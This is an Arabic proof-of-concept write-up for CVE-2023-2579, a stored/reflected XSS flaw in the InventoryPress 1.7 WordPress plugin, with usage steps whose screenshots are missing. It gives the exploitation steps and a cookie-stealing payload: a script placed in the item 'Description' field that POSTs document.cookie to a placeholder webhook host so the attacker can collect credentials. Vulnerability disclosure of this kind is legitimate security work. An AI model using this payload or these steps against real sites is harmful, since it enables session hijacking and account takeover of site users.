
إثبات المفهوم لـ CVE-2023-2579
تم حجز معرف CVE-2023-2579 ونشر الإثبات المفاهيمي في موقع WPScan: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
العنوان: ثغرة برمجة نصية عبر المواقع (XSS) منعكسة وموثقة في إضافة InventoryPress لنظام إدارة المحتوى ووردبريس
التاريخ: 2023-04-21
المؤلف: Danilo Albuquerque
الصفحة الرئيسية للبائع: https://wordpress.org
رابط البرنامج: https://wordpress.org/download
الإصدار: ووردبريس 6.2
اسم الإضافة وإصدارها: InventoryPress 1.7
تم الاختبار على: Brave (الإصدار 1.50.119 Chromium: 112.0.5615.121 (الإصدار الرسمي) 64 بت)
عند القيام بكل ذلك وتحديث الصفحة الحالية، ستظهر لك نافذة منبثقة للتنبيه تحتوي على الرسالة.
انتقل إلى الصفحة التي يمكنك من خلالها إضافة العناصر إلى المخزون:

أضف الحمولة الخبيثة إلى حقل "الوصف" في النموذج:

قم بالوصول إلى رابط العنصر الجديد الذي تم إنشاؤه بواسطة الإضافة:

بمجرد اكتمال الطلب، تظهر النافذة المنبثقة للتنبيه:

أضف الحمولة التالية لسرقة ملفات تعريف الارتباط في حقل "الوصف": <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. ثم انشر العنصر الجديد، أو قم بتحديث عنصر قديم؛
قم بتشغيلها واحصل على بيانات الاعتماد في موقع Webhook
إضافة الحمولة ونشر العنصر (أو تحديثه):

التشغيل والحصول على بيانات الاعتماد:
